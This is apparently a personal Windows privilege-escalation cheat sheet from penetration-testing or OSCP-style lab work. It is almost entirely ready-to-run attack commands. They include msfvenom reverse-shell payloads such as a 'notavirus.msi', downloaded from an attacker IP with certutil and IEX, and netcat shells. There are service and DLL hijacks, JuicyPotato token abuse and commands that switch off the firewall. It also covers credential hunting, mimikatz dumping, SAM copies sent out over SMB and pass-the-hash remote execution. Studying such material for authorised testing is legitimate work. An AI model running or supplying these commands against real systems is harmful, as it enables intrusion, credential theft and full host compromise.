mxwinenum

================================== 
whoami
whoami /priv

Impersonate
SeRestorePrivilege = Enable-System32-Utilman-RDP
SeImpersonatePrivilege = juicypotato/printspoof
# \\192.168.162.46\share\juicy.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c  \\192.168.162.46\share\nc.exe -e cmd.exe 192.168.162.46 4447" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} 

================================== 
hostname                    
echo %username% 
net users 
net user mike 
net user Administrator 
net group "Domain Admins" 
reg query HKLM /f pass /t REG_SZ /s
echo %path%      ..maybe dll hijack
cmdkey /list

================================== 
Files

dir /a                ..hidden files
dir /r                ..alternate data stream

cd C:\ & dir /a
dir /a C:\Users
tree /a /f C:\Users\ 

cd C:\$Recycle.Bin & dir /a 
type c:\Windows\win.ini   
type c:\Windows\System32\drivers\etc\hosts  
type c:\Windows\System32\License.rtf 


================================== 
Kernel Exploits
 
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

Google: "windows 7 enterprise 6.1.7600 priv esc vulnerabilities"
 
systeminfo > systeminfo.txt 
kali> wes.py --update 
kali> wes.py systeminfo.txt --exploits-only --color -o wes-exp.csv 
 
 
================================== 
Network
 
ipconfig /all 
netstat -nao 
netstat -pantu 
netstat -nat | findstr LISTEN  
route print 
 
================================== 
Web Hunt

dir /a C:\inetpub\
dir /b /s web.config

================================== 
Cred Hunt

search -f *pass* 
dir /b /s *pass* 
dir /s *pass* == *cred* == *vnc* == *.config* 
findstr /si password *.txt 
findstr /si password *.xml 
findstr /si password *.ini 
findstr /spin "password" *.* 


================================== 
Sysprep

dir /b /s *unattend* == *unattended* == *sysprep* == *groups.xml* 
dir /b /s unattend.xml  
dir /b /s Unattended.xml  
dir /b /s web.config  
dir /b /s sysprep.inf  
dir /b /s sysprep.xml  
dir /b /s Groups.xml

type c:\sysprep.inf 
type c:\sysprep\sysprep.xml 
type c:\unattend.xml 
type C:\Windows\System32\Unattend.xml 
type C:\Windows\System32\sysprep\Unattend.xml 
type C:\Windows\Panther\Unattend.xml 
type C:\Windows\Panther\Unattend\Unattend.xml 
type %WINDIR%\Panther\Unattend\Unattended.xml 
type %WINDIR%\Panther\Unattended.xml 

findstr /S cpassword %LOGONSERVER%\sysvol\*.xml


================================== 
Services 
 
tasklist /V 
tasklist /v /fi "username eq system" 
tasklist /v | findstr /si "system admin"  
tasklist /SVC
 
sc query state= all
sc query IKEEXT
wmic service list brief  
wmic product get name, version, vendor 
wmic qfe get Caption, Description, HotFixID, InstalledOn 
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 
wmic service where caption="IKEEXT" get name, caption, state, startmode

icalcs C:\Barracuda\bd.exe 
copy /Y C:\Windows\Temp\shell.exe C:\bd\bd.exe 
shutdown -r 
nc -nvlp 445 
 
 
 
================================== 
Tunnel an Internal Service
 
netstat -nat | findstr LISTEN | findstr 127 
127.0.0.1:8080 LISTENING 
 
Share
cd ~/tools/privesc_windows  
python3 -m http.server 80
certutil -urlcache -split -f http://192.168.162.46:80/chisel-amd64.exe  
 
Connect
kali> chisel-linux64 server --reverse --port 443  -v
wind> chisel-amd64.exe client 192.168.162.46:443 R:8080:localhost:8080  
kali> firefox 127.0.0.1:8080   
 
 
==================================  
set 
set path 
set username 
 
==================================  
netsh firewall show state  
netsh firewall show config 
netsh advfirewall show currentprofile 
netsh advfirewall firewall show rule name=all 

netsh firewall set opmode disable
netsh advfirewall set allprofiles state off  


 
================================== 
mountvol 
driverquery /v 
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
 
 
================================== 
AlwaysInstallElevated 
 
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer 
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer 

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer 
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.162.46 LPORT=445 -f msi > notavirus.msi 
python3 -m http.server 80
certutil -urlcache -split -f http://192.168.162.46:80/notavirus.msi 
.\notavirus.msi 
msiexec /i "C:\Users\shenzi\Downloads\notavirus.msi" 
nc -nvlp 445
 
 
================================== 
Tasks 
 
schtasks /query /fo LIST /v 
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

 
 
================================== 
Software
Installed Programs have vulns/configs/creds
 
dir /s "c:\Program Files" 
dir /s "c:\Program Files (x86)" 

dir c:\*vnc.ini /s /b 
dir c:\*ultravnc.ini /s /b  
dir c:\ /s /b | findstr /si *vnc.ini 

reg query "HKCU\Software\ORL\WinVNC3\Password" 
reg query "HKCU\Software\TightVNC\Server /v PasswordViewOnly"
vncpwd.exe <pw found>

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 

search -f *pass* 

netsh wlan show profiles
netsh wlan profile name="mywifi" key=clear

================================== 
Startups

wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

 
================================== 
Logic Plan 
 
Metasploit > getSystem (NamedPipe)
PrintSpoofer/Juicy/Rotten Potato 
UACBypass 
System Processes 
 
================================== 
Keep a List: 
 
1. Web Application - IIS 
2. Web Server - 80 http  
3. Samba 445 - EternalBlue? 
4. Microsoft SQL Server 2017 RTM 14.00.1000.00  
5. Remote RDP-3389, Winrm-5985  
6. Windows Server 2016 Standard 14393 (6.3) 64 bit 
 

================================== 
Search Registry for Passwords

reg query HKLM /f password /t REG_SZ /s 
reg query HKCU /f password /t REG_SZ /s 

 
================================== 
Autologon Creds 
 
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" 
 
  
================================== 
Saved Creds 
 
cmdkey /list 
runas /savecred /u:administrator cmd.exe
runas /savecred /user:admin C:\PrivEsc\reverse.exe 
C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.162.46 4444 -e cmd.exe" 
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \IP\share\nc.exe -nv 192.168.162.46 80 -e cmd.exe"
 
  
================================== 
Credential Manager 
 
dir c:\users\username\appdata\roaming\microsoft\credentials 
type "%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" 
type "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"  
Check for credentials in .rdg files 


================================== 
Powerup - Find Exploitable Service
 
ALL common Windows privesc (bypassuac, service-abuse, gpp-passwords, tokens) 
Dev branch has extra checks – Can find 'SeImpersonatePrivilege' tokens too 
Look for services running as 'System'. 

mkdir c:\temp
python3 -m http.server 80
wget http://192.168.162.46/powerup.ps1 -o powerup.ps1
certutil -urlcache -split -f http://192.168.162.46:80/PowerUp.ps1 
powershell -exec bypass -Command "& Import-Module .\\PowerUp.ps1;Invoke-AllChecks"
powershell -nop -noexit -exec bypass -c '.\PowerUp.ps1'
powershell.exe -nop -ExecutionPolicy bypass  
IEX(New-Object Net.WebClient).downloadString('http://192.168.162.46:80/PowerUp.ps1') 
Import-Module .\PowerUp.ps1 
Invoke-AllChecks 

Found Exploitable Service
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.162.46 LPORT=80 -f exe -o mike80.exe 
python3 -m http.server 80
certutil -urlcache -split -f http://192.168.162.46:80/mike80.exe 
cd C:\xampp\fz\ 
move fz.exe fz.old 
move C:\xampp\upload\mike80.exe fz.exe 
shutdown -r
nc -nvlp 80


================================== 
Unquoted Service Path PrivEsc

searchsploit foxit 7.
dir "C:\Program Files (x86)" 
sc qc FCUpdateService 
wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """ 
echo ok > "C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\test.txt"
echo ok > "C:\Program Files (x86)\Foxit Software\Foxit Reader\test.txt" 
echo ok > "C:\Program Files (x86)\Foxit Software\test.txt" 
echo ok > "C:\Program Files (x86)\test.txt" 
msfvenom -p windows/shell_reverse_tcp -f exe --platform windows -a x86 LHOST=192.168.162.46 LPORT=443 > rev.exe 
python3 -m http.server 80
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.162.46/rev.exe', 'C:\Program Files (x86)\Foxit Software\Foxit.exe')" 
shutdown -r -t 10 && exit 
nc -nvlp 443


==================================
BINARY_PATH_NAME

mkdir c:\temp
python3 -m http.server 80
wget http://192.168.162.46/powerup.ps1 -o powerup.ps1
wget http://192.168.162.46/nc.exe -o nc.exe
Import-Module .\powerup.ps1
Invoke-AllChecks

Vulnerable Service: UsoSvc - BINARY_PATH_NAME is Vulnerable
C:\Windows\system32\svchost.exe -k netsvcs -p

sc.exe qc UsoSvc
sc.exe config usosvc binpath="c:\windows\temp\nc.exe 192.168.162.46 443 -e cmd.exe"
sc.exe config usosvc obj=LocalSystem
net stop usosvc
net start usosvc
nc -nvlp 443

==================================
DLL Hijack

powershell -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.162.46 LPORT=445 -f dll -o wlbsctrl.dll
copy c:\xampp\htdocs\wlbsctrl.dll c:\Python27\
powershell -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Write-HijackDll -DllPath 'C:\\Python27\\wlbsctrl.dll'}"
shutdown -r -t 10 && exit
nc -nvlp 445


================================== 
DLL Hijack
Example: Vista/Win8

sc query IKEEXT          ..Want LocalSystem 
wmic service where caption="IKEEXT" get name, caption, state, startmode 
c:> dir wlbsctrl.dll /s  ..Want Missing (Normally C:\Windows\System32\wlbsctrl.dll)
echo %path%              ..Want Exploitable-Path 
cacls "C:\Python27"      ..Want Authenticated Users (M) 
accesssschk.exe -dqv "C:\Python27" 
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.162.46 LPORT=445 -f dll > shell.dll  
python3 -m http.server 80
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.162.46/shell.dll', 'C:\Python27\wlbsctrl.dll')" 
copy shell.dll C:\Python27\wlbsctrl.dll 
net stop IKEEXT
sc restart IKEEXT
shutdown -r -t 10 && exit   
rlwrap nc -nvlp 445 


================================== 
TOOLS 
 
cd ~\tools\privesc_windows
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share `pwd` -smb2support -username mike -password helps  
net use \\192.168.162.46\share /USER:mike helps  
mkdir C:\temp
cd C:\temp\
cd C:\Users\Bob\Downloads\ 
copy winPEASx64.exe \\192.168.162.46\share\
copy chisel.exe \\192.168.162.46\share\
copy mimikatz_64.exe \\192.168.162.46\share\
copy PowerUp.ps1 \\192.168.162.46\share\
copy SharpHound.exe \\192.168.162.46\share\
copy nc.exe \\192.168.162.46\share\ 
copy Invoke-Kerberoast.ps1 \\192.168.162.46\share\  

python3 -m http.server 80
certutil -urlcache -split -f http://192.168.162.46:80/winPEASx64.exe 
certutil -urlcache -split -f http://192.168.162.46:80/chisel.exe 
certutil -urlcache -split -f http://192.168.162.46:80/mimikatz_64.exe 
certutil -urlcache -split -f http://192.168.162.46:80/PowerUp.ps1 
certutil -urlcache -split -f http://192.168.162.46:80/SharpHound.exe  
certutil -urlcache -split -f http://192.168.162.46:80/nc.exe 
certutil -urlcache -split -f http://192.168.162.46:80/Invoke-Kerberoast.ps1  
certutil -urlcache -split -f http://192.168.162.46:80/lazagne.exe   ..try this out

Powershell
powershell.exe -nop -ExecutionPolicy bypass  
IEX(New-Object Net.WebClient).downloadString('http://192.168.162.46:80/PowerUp.ps1') 

==================================
LaZagne - Cred Search
https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe
laZagne.exe all
laZagne.exe all -oA -output C:\Users\test\Desktop
 
================================== 
Quick-Paste-Report
https://pentest.mxhx.org/07-win-privesc/win-enum#quick-paste-report 
 
================================== 
winPEAS
Favorite tool for a big variety of PrivEscs
 
Enable Colors
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
winPEASx64.exe 
 
Found:
Writable service binary/dll/unquoted 
BarracudaDrive 'bd' Service 
icalcs C:\bd\bd.exe 
copy /Y C:\xammp\htdocs\shell.exe C:\bd\bd.exe 
shutdown -r 
nc -nvlp 445 



================================== 
WES – Kernel Checks 
 
mkdir c:\temp
cd c:\temp
systeminfo > systeminfo.txt 
 
Kali:
wes.py --update 
wes.py systeminfo.txt -o wesall.csv 
wes.py systeminfo.txt --hide "Internet Explorer" Edge Flash 
wes.py systeminfo.txt --exploits-only --color 
 
REF:
https://github.com/bitsadmin/wesng/blob/master/CMDLINE.md 
 
 
================================== 
Checklists: 
 
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://book.hacktricks.xyz/windows/active-directory-methodology 
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet 
https://github.com/mchern1kov/pentest-everything/blob/master/privesc/windows/README.md 
https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/ 

 
================================== 
SAM - Quickcheck

dir %SYSTEMROOT%\repair\*S*
dir %SYSTEMROOT%\System32\config\RegBack\*S*
dir %SYSTEMROOT%\System32\config\*S*

Consider: mxsam
================================== 
SAM

mkdir c:\temp
cd c:\temp\  
copy samx \\192.168.162.46\share\  
copy systemx \\192.168.162.46\share\  
copy securityx \\192.168.162.46\share\  
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share `pwd` -smb2support -username mike -password helps  
net use \\192.168.162.46\share /USER:mike helps
copy *x \\192.168.162.46\share\  
secretsdump -sam samx -system systemx LOCAL  
 
 
================================== 
mimikatz 
 
mimikatz_64.exe              ..as admin if you can 
privilege::debug  
token::elevate  
sekurlsa::logonpasswords     ..auto-logon passwords  
lsadump::secrets             ..WOW saved creds!!  

sekurlsa::dpapi              ..extract DPAPI masterkeys 
dpapi::rdg                   ..decrypt .rdg files (needs masterkey) 
lsadump::sam                 ..NTLM 
lsadump::cache               ..MsCacheV2 might crack  
lsadump::lsa /inject         ..? 
sekurlsa::tickets            ..roast  
kerberos::list /export       ..after requesting ticket w/powershell  
klist  


================================== 
mimikatz powershell
powershell -ep bypass .\Invoke-Mimikatz.ps1
powershell -nop -noexit -exec bypass -c '.\Invoke-Mimikatz.ps1' 
 
================================== 
Bloodhound 
 
locate Sharphound.exe 
python3 -m http.server 80
powershell wget 192.168.162.46:80/SharpHound.exe -O SharpHound.exe 
SharpHound.exe --CollectionMethod All 
 
nc -nvlp 445 > bloodhound.zip  
nc.exe -w3 192.168.162.46 445 < 20221111_BloodHound.zip  
sudo service neo4j start 
http://localhost:7474/browser/  
./bloodhound & 
Right-side menu >  Upload Data > sharphound.zip 
Analysis > Find Shortest Path to Domain Admins 
 

================================== 
Ping for Nearby Machines: 
 
for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.200.%i > nul && echo 192.168.200.%i is up  



================================== 
Refresh Tools

mkdir ~/tools/old
mv ~/tools/privesc_windows ~/tools/old/
mkdir ~/tools/privesc_windows
cd ~/tools/privesc_windows

git clone https://github.com/carlospolop/PEASS-ng/releases/ 
linpeas.sh 
winPEAS.bat 
winPEASx64.exe 
winPEASx86.exe 
 
git clone https://github.com/PowerShellMafia/PowerSploit -b dev 
PowerUp.ps1
 
git clone https://github.com/bitsadmin/wesng --depth 1 
wes.py

wget https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe
lazagne.exe

https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
Invoke-Kerberoast.ps1  

chisel.exe 
https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_386.gz
https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz

https://github.com/BloodHoundAD/SharpHound/releases/download/v1.0.4/SharpHound-v1.0.4.zip
SharpHound.exe

https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip
Mimikatz_64.exe


================================== 
Remotes 

xfreerdp /v:192.168.200.5 /d:mike.com /u:mike /p:pass -sec-nla +clipboard /geometry /w:1680 /h:900 
psexec mydom/administrator:"paxx"@192.168.200.5
psexec admin@192.168.200.5 -hashes aad3b435b51404:ee0c207898a5bc   
psexec mydom/bob:Paxxword@192.168.200.5
dcomexec.py mydom/administrator:"password!"@192.168.200.5
smbexec.py mydom/administrator:"password!"@192.168.200.5
wmiexec.py mydom/administrator:"password!"@192.168.200.5
atexec.py mydom/administrator:"password!"@192.168.200.5 "whoami" 

================================== 
Track, Attack and Pwn

psexec mike.com/sqlserver:sqlpax@192.168.200.5
psexec mike.com/david:paxx@192.168.200.5
secretsdump mike.com/david:paxx@192.168.200.5

================================== 
Proof 
type proof.txt && whoami && hostname && ipconfig 
 
================================== 
Consider
mxsam, mxpivot, mxtransfer, mxad, mxsamba